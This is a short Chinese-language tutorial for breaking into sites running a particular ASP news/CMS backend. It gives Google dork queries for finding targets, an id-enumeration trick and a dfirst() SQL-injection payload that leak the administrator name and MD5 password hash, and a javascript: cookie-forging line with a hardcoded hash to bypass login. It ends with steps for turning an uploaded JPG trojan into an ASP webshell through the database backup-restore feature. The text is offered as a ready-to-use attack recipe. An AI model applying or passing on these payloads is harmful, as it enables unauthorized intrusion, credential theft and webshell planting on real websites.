在谷歌搜索 inurl: admin/admin_news_pl_view.asp 打开搜索到的网址或者输入 inurl:news_more.asp?lm2=
然后修改成 admin/admin_news_pl_view.asp?id=1 或者 admin/admin_news_pl_view.asp?id=2 或者 admin/admin_news_pl_view.asp?id=3
只要显示错误就一直打3,4,5......
找到管理员和32位MDB密码后破解MDB密码,然后进后台 admin/admin_index.asp 输入破解好的用户名和密码直接进系统
另外还可以这样子进后台:
|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username=' // 得到管理员用户和MD5密码
cookies进后台
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
在系统里面有上传图片的功能,上传后,再用备份恢复数据库的功能来恢复上传好的JPG木马成 ASP格式,搞定。